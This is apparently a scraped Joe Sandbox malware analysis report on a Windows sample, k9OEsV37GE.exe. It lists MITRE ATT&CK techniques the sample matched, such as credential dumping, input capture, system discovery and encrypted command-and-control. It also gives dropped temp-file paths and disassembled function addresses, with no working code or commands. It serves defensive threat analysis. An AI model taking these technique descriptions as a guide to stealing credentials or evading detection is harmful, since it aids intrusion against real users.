Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report k9OEsV37GE.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\18155I0h

C:\Users\user\AppData\Local\Temp\aut41C4.tmp

C:\Users\user\AppData\Local\Temp\nondefinition

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
k9OEsV37GE.exe

Function 00F03B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00F049A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00F04E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00F69155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00F03015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 00F03041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00F0708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00F03A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00F03633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00F03766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 018F52D0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00F039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 018F5080 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre